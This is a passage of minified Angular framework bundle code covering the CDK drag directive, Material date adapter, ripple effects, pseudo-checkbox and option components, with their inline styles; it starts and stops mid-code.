this._dragRef.getPlaceholderElement()}getRootElement(){return this._dragRef.getRootElement()}reset(){this._dragRef.reset()}getFreeDragPosition(){return this._dragRef.getFreeDragPosition()}setFreeDragPosition(e){this._dragRef.setFreeDragPosition(e)}ngAfterViewInit(){this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._updateRootElement(),this._setupHandlesListener(),this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)})})}ngOnChanges(e){const i=e.rootElementSelector,n=e.freeDragPosition;i&&!i.firstChange&&this._updateRootElement(),n&&!n.firstChange&&this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)}ngOnDestroy(){this.dropContainer&&this.dropContainer.removeItem(this);const e=t._dragInstances.indexOf(this);e>-1&&t._dragInstances.splice(e,1),this._ngZone.runOutsideAngular(()=>{this._destroyed.next(),this._destroyed.complete(),this._dragRef.dispose()})}_updateRootElement(){var e;const i=this.element.nativeElement;let n=i;this.rootElementSelector&&(n=void 0!==i.closest?i.closest(this.rootElementSelector):null===(e=i.parentElement)||void 0===e?void 0:e.closest(this.rootElementSelector)),this._dragRef.withRootElement(n||i)}_getBoundaryElement(){const e=this.boundaryElement;return e?"string"==typeof e?this.element.nativeElement.closest(e):Gr(e):null}_syncInputs(e){e.beforeStarted.subscribe(()=>{if(!e.isDragging()){const i=this._dir,n=this.dragStartDelay,r=this._placeholderTemplate?{template:this._placeholderTemplate.templateRef,context:this._placeholderTemplate.data,viewContainer:this._viewContainerRef}:null,c=this._previewTemplate?{template:this._previewTemplate.templateRef,context:this._previewTemplate.data,matchSize:this._previewTemplate.matchSize,viewContainer:this._viewContainerRef}:null;e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.dragStartDelay="object"==typeof n&&n?n:Uo(n),e.constrainPosition=this.constrainPosition,e.previewClass=this.previewClass,e.withBoundaryElement(this._getBoundaryElement()).withPlaceholderTemplate(r).withPreviewTemplate(c).withPreviewContainer(this.previewContainer||"global"),i&&e.withDirection(i.value)}}),e.beforeStarted.pipe(Cn(1)).subscribe(()=>{var i;if(this._parentDrag)return void e.withParent(this._parentDrag._dragRef);let n=this.element.nativeElement.parentElement;for(;n;){if(n.classList.contains("cdk-drag")){e.withParent((null===(i=t._dragInstances.find(r=>r.element.nativeElement===n))||void 0===i?void 0:i._dragRef)||null);break}n=n.parentElement}})}_handleEvents(e){e.started.subscribe(i=>{this.started.emit({source:this,event:i.event}),this._changeDetectorRef.markForCheck()}),e.released.subscribe(i=>{this.released.emit({source:this,event:i.event})}),e.ended.subscribe(i=>{this.ended.emit({source:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:i.container.data,item:this,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:i.container.data,item:this})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,isPointerOverContainer:i.isPointerOverContainer,item:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event})})}_assignDefaults(e){const{lockAxis:i,dragStartDelay:n,constrainPosition:r,previewClass:c,boundaryElement:d,draggingDisabled:T,rootElementSelector:k,previewContainer:q}=e;this.disabled=null!=T&&T,this.dragStartDelay=n||0,i&&(this.lockAxis=i),r&&(this.constrainPosition=r),c&&(this.previewClass=c),d&&(this.boundaryElement=d),k&&(this.rootElementSelector=k),q&&(this.previewContainer=q)}_setupHandlesListener(){this._handles.changes.pipe(Ro(this._handles),qr(e=>{const i=e.filter(n=>n._parentDrag===this).map(n=>n.element);this._selfHandle&&this.rootElementSelector&&i.push(this.element),this._dragRef.withHandles(i)}),Ur(e=>ra(...e.map(i=>i._stateChanges.pipe(Ro(i))))),ea(this._destroyed)).subscribe(e=>{const i=this._dragRef,n=e.element.nativeElement;e.disabled?i.disableHandle(n):i.enableHandle(n)})}}return t._dragInstances=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(fW,12),Ee(ga),Ee(qi),Ee(fo),Ee(hW,8),Ee(Cr,8),Ee(Hw),Ee(Ma),Ee(pW,10),Ee(mW,12))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDrag",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,vpe,5),fa(n,Mpe,5),fa(n,pW,5)),2&e){let r;Vt(r=Bt())&&(i._previewTemplate=r.first),Vt(r=Bt())&&(i._placeholderTemplate=r.first),Vt(r=Bt())&&(i._handles=r)}},hostAttrs:[1,"cdk-drag"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("cdk-drag-disabled",i.disabled)("cdk-drag-dragging",i._dragRef.isDragging())},inputs:{data:["cdkDragData","data"],lockAxis:["cdkDragLockAxis","lockAxis"],rootElementSelector:["cdkDragRootElement","rootElementSelector"],boundaryElement:["cdkDragBoundary","boundaryElement"],dragStartDelay:["cdkDragStartDelay","dragStartDelay"],freeDragPosition:["cdkDragFreeDragPosition","freeDragPosition"],disabled:["cdkDragDisabled","disabled"],constrainPosition:["cdkDragConstrainPosition","constrainPosition"],previewClass:["cdkDragPreviewClass","previewClass"],previewContainer:["cdkDragPreviewContainer","previewContainer"]},outputs:{started:"cdkDragStarted",released:"cdkDragReleased",ended:"cdkDragEnded",entered:"cdkDragEntered",exited:"cdkDragExited",dropped:"cdkDragDropped",moved:"cdkDragMoved"},exportAs:["cdkDrag"],features:[ki([{provide:mW,useExisting:t}]),sa]}),t})(),_W=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Hw],imports:[uu]}),t})();const Tpe=["*",[["mat-option"],["ng-container"]]],Epe=["*","mat-option, ng-container"];function Dpe(t,a){if(1&t&&it(0,"mat-pseudo-checkbox",4),2&t){const e=B();V("state",e.selected?"checked":"unchecked")("disabled",e.disabled)}}function xpe(t,a){if(1&t&&(m(0,"span",5),s(1),u()),2&t){const e=B();C(1),ct("(",e.group.label,")")}}const wpe=["*"];let Ipe=(()=>{class t{}return t.STANDARD_CURVE="cubic-bezier(0.4,0.0,0.2,1)",t.DECELERATION_CURVE="cubic-bezier(0.0,0.0,0.2,1)",t.ACCELERATION_CURVE="cubic-bezier(0.4,0.0,1,1)",t.SHARP_CURVE="cubic-bezier(0.4,0.0,0.6,1)",t})(),Rpe=(()=>{class t{}return t.COMPLEX="375ms",t.ENTERING="225ms",t.EXITING="195ms",t})();const kpe=new ni("mat-sanity-checks",{providedIn:"root",factory:function Spe(){return!0}});let la=(()=>{class t{constructor(e,i,n){this._sanityChecks=i,this._document=n,this._hasDoneGlobalChecks=!1,e._applyBodyHighContrastModeCssClasses(),this._hasDoneGlobalChecks||(this._hasDoneGlobalChecks=!0)}_checkIsEnabled(e){return!rw()&&("boolean"==typeof this._sanityChecks?this._sanityChecks:!!this._sanityChecks[e])}}return t.\u0275fac=function(e){return new(e||t)(At(Qz),At(kpe,8),At(ga))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,R1]}),t})();function Zc(t){return class extends t{constructor(...a){super(...a),this._disabled=!1}get disabled(){return this._disabled}set disabled(a){this._disabled=wi(a)}}}function Pd(t,a){return class extends t{constructor(...e){super(...e),this.defaultColor=a,this.color=a}get color(){return this._color}set color(e){const i=e||this.defaultColor;i!==this._color&&(this._color&&this._elementRef.nativeElement.classList.remove(`mat-${this._color}`),i&&this._elementRef.nativeElement.classList.add(`mat-${i}`),this._color=i)}}}function El(t){return class extends t{constructor(...a){super(...a),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(a){this._disableRipple=wi(a)}}}function dp(t,a=0){return class extends t{constructor(...e){super(...e),this._tabIndex=a,this.defaultTabIndex=a}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?Uo(e):this.defaultTabIndex}}}function Uw(t){return class extends t{constructor(...a){super(...a),this.errorState=!1}updateErrorState(){const a=this.errorState,r=(this.errorStateMatcher||this._defaultErrorStateMatcher).isErrorState(this.ngControl?this.ngControl.control:null,this._parentFormGroup||this._parentForm);r!==a&&(this.errorState=r,this.stateChanges.next())}}}function yW(t){return class extends t{constructor(...a){super(...a),this._isInitialized=!1,this._pendingSubscribers=[],this.initialized=new G(e=>{this._isInitialized?this._notifySubscriber(e):this._pendingSubscribers.push(e)})}_markInitialized(){this._isInitialized=!0,this._pendingSubscribers.forEach(this._notifySubscriber),this._pendingSubscribers=null}_notifySubscriber(a){a.next(),a.complete()}}}const Ppe=new ni("MAT_DATE_LOCALE",{providedIn:"root",factory:function Ope(){return Po(dm)}});class pu{constructor(){this._localeChanges=new J,this.localeChanges=this._localeChanges}getValidDateOrNull(a){return this.isDateInstance(a)&&this.isValid(a)?a:null}deserialize(a){return null==a||this.isDateInstance(a)&&this.isValid(a)?a:this.invalid()}setLocale(a){this.locale=a,this._localeChanges.next()}compareDate(a,e){return this.getYear(a)-this.getYear(e)||this.getMonth(a)-this.getMonth(e)||this.getDate(a)-this.getDate(e)}sameDate(a,e){if(a&&e){let i=this.isValid(a),n=this.isValid(e);return i&&n?!this.compareDate(a,e):i==n}return a==e}clampDate(a,e,i){return e&&this.compareDate(a,e)<0?e:i&&this.compareDate(a,i)>0?i:a}}const qw=new ni("mat-date-formats"),Npe=/^\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|(?:(?:\+|-)\d{2}:\d{2}))?)?$/;function Gw(t,a){const e=Array(t);for(let i=0;i<t;i++)e[i]=a(i);return e}let Lpe=(()=>{class t extends pu{constructor(e,i){super(),this.useUtcForDisplay=!1,super.setLocale(e)}getYear(e){return e.getFullYear()}getMonth(e){return e.getMonth()}getDate(e){return e.getDate()}getDayOfWeek(e){return e.getDay()}getMonthNames(e){const i=new Intl.DateTimeFormat(this.locale,{month:e,timeZone:"utc"});return Gw(12,n=>this._format(i,new Date(2017,n,1)))}getDateNames(){const e=new Intl.DateTimeFormat(this.locale,{day:"numeric",timeZone:"utc"});return Gw(31,i=>this._format(e,new Date(2017,0,i+1)))}getDayOfWeekNames(e){const i=new Intl.DateTimeFormat(this.locale,{weekday:e,timeZone:"utc"});return Gw(7,n=>this._format(i,new Date(2017,0,n+1)))}getYearName(e){const i=new Intl.DateTimeFormat(this.locale,{year:"numeric",timeZone:"utc"});return this._format(i,e)}getFirstDayOfWeek(){return 0}getNumDaysInMonth(e){return this.getDate(this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+1,0))}clone(e){return new Date(e.getTime())}createDate(e,i,n){let r=this._createDateWithOverflow(e,i,n);return r.getMonth(),r}today(){return new Date}parse(e,i){return"number"==typeof e?new Date(e):e?new Date(Date.parse(e)):null}format(e,i){if(!this.isValid(e))throw Error("NativeDateAdapter: Cannot format invalid date.");const n=new Intl.DateTimeFormat(this.locale,Object.assign(Object.assign({},i),{timeZone:"utc"}));return this._format(n,e)}addCalendarYears(e,i){return this.addCalendarMonths(e,12*i)}addCalendarMonths(e,i){let n=this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+i,this.getDate(e));return this.getMonth(n)!=((this.getMonth(e)+i)%12+12)%12&&(n=this._createDateWithOverflow(this.getYear(n),this.getMonth(n),0)),n}addCalendarDays(e,i){return this._createDateWithOverflow(this.getYear(e),this.getMonth(e),this.getDate(e)+i)}toIso8601(e){return[e.getUTCFullYear(),this._2digit(e.getUTCMonth()+1),this._2digit(e.getUTCDate())].join("-")}deserialize(e){if("string"==typeof e){if(!e)return null;if(Npe.test(e)){let i=new Date(e);if(this.isValid(i))return i}}return super.deserialize(e)}isDateInstance(e){return e instanceof Date}isValid(e){return!isNaN(e.getTime())}invalid(){return new Date(NaN)}_createDateWithOverflow(e,i,n){const r=new Date;return r.setFullYear(e,i,n),r.setHours(0,0,0,0),r}_2digit(e){return("00"+e).slice(-2)}_format(e,i){const n=new Date;return n.setUTCFullYear(i.getFullYear(),i.getMonth(),i.getDate()),n.setUTCHours(i.getHours(),i.getMinutes(),i.getSeconds(),i.getMilliseconds()),e.format(n)}}return t.\u0275fac=function(e){return new(e||t)(At(Ppe,8),At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const zpe={parse:{dateInput:null},display:{dateInput:{year:"numeric",month:"numeric",day:"numeric"},monthYearLabel:{year:"numeric",month:"short"},dateA11yLabel:{year:"numeric",month:"long",day:"numeric"},monthYearA11yLabel:{year:"numeric",month:"long"}}};let Wpe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:pu,useClass:Lpe}]}),t})(),bW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:qw,useValue:zpe}],imports:[Wpe]}),t})(),mp=(()=>{class t{isErrorState(e,i){return!!(e&&e.invalid&&(e.touched||i&&i.submitted))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Or=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-line",""],["","matLine",""]],hostAttrs:[1,"mat-line"]}),t})();function eb(t,a,e){t.nativeElement.classList.toggle(a,e)}let vW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();class Fpe{constructor(a,e,i,n=!1){this._renderer=a,this.element=e,this.config=i,this._animationForciblyDisabledThroughCss=n,this.state=3}fadeOut(){this._renderer.fadeOutRipple(this)}}const AW={enterDuration:225,exitDuration:150},jw=ym({passive:!0}),TW=["mousedown","touchstart"],EW=["mouseup","mouseleave","touchend","touchcancel"];class DW{constructor(a,e,i,n){this._target=a,this._ngZone=e,this._isPointerDown=!1,this._activeRipples=new Map,this._pointerUpEventsRegistered=!1,n.isBrowser&&(this._containerElement=Gr(i))}fadeInRipple(a,e,i={}){const n=this._containerRect=this._containerRect||this._containerElement.getBoundingClientRect(),r=Object.assign(Object.assign({},AW),i.animation);i.centered&&(a=n.left+n.width/2,e=n.top+n.height/2);const c=i.radius||function Bpe(t,a,e){const i=Math.max(Math.abs(t-e.left),Math.abs(t-e.right)),n=Math.max(Math.abs(a-e.top),Math.abs(a-e.bottom));return Math.sqrt(i*i+n*n)}(a,e,n),d=a-n.left,T=e-n.top,k=r.enterDuration,q=document.createElement("div");q.classList.add("mat-ripple-element"),q.style.left=d-c+"px",q.style.top=T-c+"px",q.style.height=2*c+"px",q.style.width=2*c+"px",null!=i.color&&(q.style.backgroundColor=i.color),q.style.transitionDuration=`${k}ms`,this._containerElement.appendChild(q);const Y=window.getComputedStyle(q),pe=Y.transitionDuration,Re="none"===Y.transitionProperty||"0s"===pe||"0s, 0s"===pe,Fe=new Fpe(this,q,i,Re);q.style.transform="scale3d(1, 1, 1)",Fe.state=0,i.persistent||(this._mostRecentTransientRipple=Fe);let Ne=null;return!Re&&(k||r.exitDuration)&&this._ngZone.runOutsideAngular(()=>{const et=()=>this._finishRippleTransition(Fe),ut=()=>this._destroyRipple(Fe);q.addEventListener("transitionend",et),q.addEventListener("transitioncancel",ut),Ne={onTransitionEnd:et,onTransitionCancel:ut}}),this._activeRipples.set(Fe,Ne),(Re||!k)&&this._finishRippleTransition(Fe),Fe}fadeOutRipple(a){if(2===a.state||3===a.state)return;const e=a.element,i=Object.assign(Object.assign({},AW),a.config.animation);e.style.transitionDuration=`${i.exitDuration}ms`,e.style.opacity="0",a.state=2,(a._animationForciblyDisabledThroughCss||!i.exitDuration)&&this._finishRippleTransition(a)}fadeOutAll(){this._getActiveRipples().forEach(a=>a.fadeOut())}fadeOutAllNonPersistent(){this._getActiveRipples().forEach(a=>{a.config.persistent||a.fadeOut()})}setupTriggerEvents(a){const e=Gr(a);!e||e===this._triggerElement||(this._removeTriggerEvents(),this._triggerElement=e,this._registerEvents(TW))}handleEvent(a){"mousedown"===a.type?this._onMousedown(a):"touchstart"===a.type?this._onTouchStart(a):this._onPointerUp(),this._pointerUpEventsRegistered||(this._registerEvents(EW),this._pointerUpEventsRegistered=!0)}_finishRippleTransition(a){0===a.state?this._startFadeOutTransition(a):2===a.state&&this._destroyRipple(a)}_startFadeOutTransition(a){const e=a===this._mostRecentTransientRipple,{persistent:i}=a.config;a.state=1,!i&&(!e||!this._isPointerDown)&&a.fadeOut()}_destroyRipple(a){var e;const i=null!==(e=this._activeRipples.get(a))&&void 0!==e?e:null;this._activeRipples.delete(a),this._activeRipples.size||(this._containerRect=null),a===this._mostRecentTransientRipple&&(this._mostRecentTransientRipple=null),a.state=3,null!==i&&(a.element.removeEventListener("transitionend",i.onTransitionEnd),a.element.removeEventListener("transitioncancel",i.onTransitionCancel)),a.element.remove()}_onMousedown(a){const e=W3(a),i=this._lastTouchStartEvent&&Date.now()<this._lastTouchStartEvent+800;!this._target.rippleDisabled&&!e&&!i&&(this._isPointerDown=!0,this.fadeInRipple(a.clientX,a.clientY,this._target.rippleConfig))}_onTouchStart(a){if(!this._target.rippleDisabled&&!F3(a)){this._lastTouchStartEvent=Date.now(),this._isPointerDown=!0;const e=a.changedTouches;for(let i=0;i<e.length;i++)this.fadeInRipple(e[i].clientX,e[i].clientY,this._target.rippleConfig)}}_onPointerUp(){!this._isPointerDown||(this._isPointerDown=!1,this._getActiveRipples().forEach(a=>{!a.config.persistent&&(1===a.state||a.config.terminateOnPointerUp&&0===a.state)&&a.fadeOut()}))}_registerEvents(a){this._ngZone.runOutsideAngular(()=>{a.forEach(e=>{this._triggerElement.addEventListener(e,this,jw)})})}_getActiveRipples(){return Array.from(this._activeRipples.keys())}_removeTriggerEvents(){this._triggerElement&&(TW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}),this._pointerUpEventsRegistered&&EW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}))}}const xW=new ni("mat-ripple-global-options");let Dl=(()=>{class t{constructor(e,i,n,r,c){this._elementRef=e,this._animationMode=c,this.radius=0,this._disabled=!1,this._isInitialized=!1,this._globalOptions=r||{},this._rippleRenderer=new DW(this,i,e,n)}get disabled(){return this._disabled}set disabled(e){e&&this.fadeOutAllNonPersistent(),this._disabled=e,this._setupTriggerEventsIfEnabled()}get trigger(){return this._trigger||this._elementRef.nativeElement}set trigger(e){this._trigger=e,this._setupTriggerEventsIfEnabled()}ngOnInit(){this._isInitialized=!0,this._setupTriggerEventsIfEnabled()}ngOnDestroy(){this._rippleRenderer._removeTriggerEvents()}fadeOutAll(){this._rippleRenderer.fadeOutAll()}fadeOutAllNonPersistent(){this._rippleRenderer.fadeOutAllNonPersistent()}get rippleConfig(){return{centered:this.centered,radius:this.radius,color:this.color,animation:Object.assign(Object.assign(Object.assign({},this._globalOptions.animation),"NoopAnimations"===this._animationMode?{enterDuration:0,exitDuration:0}:{}),this.animation),terminateOnPointerUp:this._globalOptions.terminateOnPointerUp}}get rippleDisabled(){return this.disabled||!!this._globalOptions.disabled}_setupTriggerEventsIfEnabled(){!this.disabled&&this._isInitialized&&this._rippleRenderer.setupTriggerEvents(this.trigger)}launch(e,i=0,n){return"number"==typeof e?this._rippleRenderer.fadeInRipple(e,i,Object.assign(Object.assign({},this.rippleConfig),n)):this._rippleRenderer.fadeInRipple(0,0,Object.assign(Object.assign({},this.rippleConfig),e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(cr),Ee(xW,8),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-ripple",""],["","matRipple",""]],hostAttrs:[1,"mat-ripple"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-ripple-unbounded",i.unbounded)},inputs:{color:["matRippleColor","color"],unbounded:["matRippleUnbounded","unbounded"],centered:["matRippleCentered","centered"],radius:["matRippleRadius","radius"],animation:["matRippleAnimation","animation"],disabled:["matRippleDisabled","disabled"],trigger:["matRippleTrigger","trigger"]},exportAs:["matRipple"]}),t})(),Od=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),wW=(()=>{class t{constructor(e){this._animationMode=e,this.state="unchecked",this.disabled=!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-pseudo-checkbox"]],hostAttrs:[1,"mat-pseudo-checkbox"],hostVars:8,hostBindings:function(e,i){2&e&&Ct("mat-pseudo-checkbox-indeterminate","indeterminate"===i.state)("mat-pseudo-checkbox-checked","checked"===i.state)("mat-pseudo-checkbox-disabled",i.disabled)("_mat-animation-noopable","NoopAnimations"===i._animationMode)},inputs:{state:"state",disabled:"disabled"},decls:0,vars:0,template:function(e,i){},styles:['.mat-pseudo-checkbox{width:16px;height:16px;border:2px solid;border-radius:2px;cursor:pointer;display:inline-block;vertical-align:middle;box-sizing:border-box;position:relative;flex-shrink:0;transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1),background-color 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox::after{position:absolute;opacity:0;content:"";border-bottom:2px solid currentColor;transition:opacity 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox.mat-pseudo-checkbox-checked,.mat-pseudo-checkbox.mat-pseudo-checkbox-indeterminate{border-color:rgba(0,0,0,0)}.mat-pseudo-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-pseudo-checkbox._mat-animation-noopable::after{transition:none}.mat-pseudo-checkbox-disabled{cursor:default}.mat-pseudo-checkbox-indeterminate::after{top:5px;left:1px;width:10px;opacity:1;border-radius:2px}.mat-pseudo-checkbox-checked::after{top:2.4px;left:1px;width:8px;height:3px;border-left:2px solid currentColor;transform:rotate(-45deg);opacity:1;box-sizing:content-box}'],encapsulation:2,changeDetection:0}),t})(),Qw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la]}),t})();const G3=new ni("MAT_OPTION_PARENT_COMPONENT"),Hpe=Zc(class{});let Upe=0,qpe=(()=>{class t extends Hpe{constructor(e){var i;super(),this._labelId="mat-optgroup-label-"+Upe++,this._inert=null!==(i=null==e?void 0:e.inertGroups)&&void 0!==i&&i}}return t.\u0275fac=function(e){return new(e||t)(Ee(G3,8))},t.\u0275dir=Ot({type:t,inputs:{label:"label"},features:[ci]}),t})();const j3=new ni("MatOptgroup");let gg=(()=>{class t extends qpe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-optgroup"]],hostAttrs:[1,"mat-optgroup"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("role",i._inert?null:"group")("aria-disabled",i._inert?null:i.disabled.toString())("aria-labelledby",i._inert?null:i._labelId),Ct("mat-optgroup-disabled",i.disabled))},inputs:{disabled:"disabled"},exportAs:["matOptgroup"],features:[ki([{provide:j3,useExisting:t}]),ci],ngContentSelectors:Epe,decls:4,vars:2,consts:[["aria-hidden","true",1,"mat-optgroup-label",3,"id"]],template:function(e,i){1&e&&(Jn(Tpe),m(0,"span",0),s(1),va(2),u(),va(3,1)),2&e&&(V("id",i._labelId),C(1),ct("",i.label," "))},styles:[".mat-optgroup-label{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup-label[disabled]{cursor:default}[dir=rtl] .mat-optgroup-label{text-align:right}.mat-optgroup-label .mat-icon{margin-right:16px;vertical-align:middle}.mat-optgroup-label .mat-icon svg{vertical-align:top}[dir=rtl] .mat-optgroup-label .mat-icon{margin-left:16px;margin-right:0}"],encapsulation:2,changeDetection:0}),t})(),Gpe=0;class IW{constructor(a,e=!1){this.source=a,this.isUserInput=e}}let jpe=(()=>{class t{constructor(e,i,n,r){this._element=e,this._changeDetectorRef=i,this._parent=n,this.group=r,this._selected=!1,this._active=!1,this._disabled=!1,this._mostRecentViewValue="",this.id="mat-option-"+Gpe++,this.onSelectionChange=new Tt,this._stateChanges=new J}get multiple(){return this._parent&&this._parent.multiple}get selected(){return this._selected}get disabled(){return this.group&&this.group.disabled||this._disabled}set disabled(e){this._disabled=wi(e)}get disableRipple(){return!(!this._parent||!this._parent.disableRipple)}get active(){return this._active}get viewValue(){return(this._getHostElement().textContent||"").trim()}select(){this._selected||(this._selected=!0,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}deselect(){this._selected&&(this._selected=!1,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}focus(e,i){const n=this._getHostElement();"function"==typeof n.focus&&n.focus(i)}setActiveStyles(){this._active||(this._active=!0,this._changeDetectorRef.markForCheck())}setInactiveStyles(){this._active&&(this._active=!1,this._changeDetectorRef.markForCheck())}getLabel(){return this.viewValue}_handleKeydown(e){(13===e.keyCode||32===e.keyCode)&&!es(e)&&(this._selectViaInteraction(),e.preventDefault())}_selectViaInteraction(){this.disabled||(this._selected=!this.multiple||!this._selected,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent(!0))}_getAriaSelected(){return this.selected||!this.multiple&&null}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._element.nativeElement}ngAfterViewChecked(){if(this._selected){const e=this.viewValue;e!==this._mostRecentViewValue&&(this._mostRecentViewValue=e,this._stateChanges.next())}}ngOnDestroy(){this._stateChanges.complete()}_emitSelectionChangeEvent(e=!1){this.onSelectionChange.emit(new IW(this,e))}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{value:"value",id:"id",disabled:"disabled"},outputs:{onSelectionChange:"onSelectionChange"}}),t})(),yr=(()=>{class t extends jpe{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(G3,8),Ee(j3,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-option"]],hostAttrs:["role","option",1,"mat-option","mat-focus-indicator"],hostVars:12,hostBindings:function(e,i){1&e&&he("click",function(){return i._selectViaInteraction()})("keydown",function(r){return i._handleKeydown(r)}),2&e&&(Gs("id",i.id),Rt("tabindex",i._getTabIndex())("aria-selected",i._getAriaSelected())("aria-disabled",i.disabled.toString()),Ct("mat-selected",i.selected)("mat-option-multiple",i.multiple)("mat-active",i.active)("mat-option-disabled",i.disabled))},exportAs:["matOption"],features:[ci],ngContentSelectors:wpe,decls:5,vars:4,consts:[["class","mat-option-pseudo-checkbox",3,"state","disabled",4,"ngIf"],[1,"mat-option-text"],["class","cdk-visually-hidden",4,"ngIf"],["mat-ripple","",1,"mat-option-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-option-pseudo-checkbox",3,"state","disabled"],[1,"cdk-visually-hidden"]],template:function(e,i){1&e&&(Jn(),ne(0,Dpe,1,2,"mat-pseudo-checkbox",0),m(1,"span",1),va(2),u(),ne(3,xpe,2,1,"span",2),it(4,"div",3)),2&e&&(V("ngIf",i.multiple),C(3),V("ngIf",i.group&&i.group._inert),C(1),V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disabled||i.disableRipple))},dependencies:[Dl,Ri,wW],styles:['.mat-option{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative;cursor:pointer;outline:none;display:flex;flex-direction:row;max-width:100%;box-sizing:border-box;align-items:center;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-option[disabled]{cursor:default}[dir=rtl] .mat-option{text-align:right}.mat-option .mat-icon{margin-right:16px;vertical-align:middle}.mat-option .mat-icon svg{vertical-align:top}[dir=rtl] .mat-option .mat-icon{margin-left:16px;margin-right:0}.mat-option[aria-disabled=true]{-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:32px}[dir=rtl] .mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:16px;padding-right:32px}.mat-option.mat-active::before{content:""}.cdk-high-contrast-active .mat-option[aria-disabled=true]{opacity:.5}.cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}[dir=rtl] .cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{right:auto;left:16px}.mat-option-text{display:inline-block;flex-grow:1;overflow:hidden;text-overflow:ellipsis}.mat-option .mat-option-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-option-pseudo-checkbox{margin-right:8px}[dir=rtl] .mat-option-pseudo-checkbox{margin-left:8px;margin-right:0}'],encapsulation:2,changeDetection:0}),t})();function $w(t,a,e){if(e.length){let i=a.toArray(),n=e.toArray(),r=0;for(let c=0;c<t+1;c++)i[c].group&&i[c].group===n[r]&&r++;return r}return 0}function RW(t,a,e,i){return t<e?t:t+a>e+i?Math.max(0,t-i+a):e}let Q3=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,rn,la,Qw]}),t})();const Qpe=["*"];let $3;function tb(t){var a;return(null===(a=function $pe(){if(void 0===$3&&($3=null,"undefined"!=typeof window)){const t=window;void 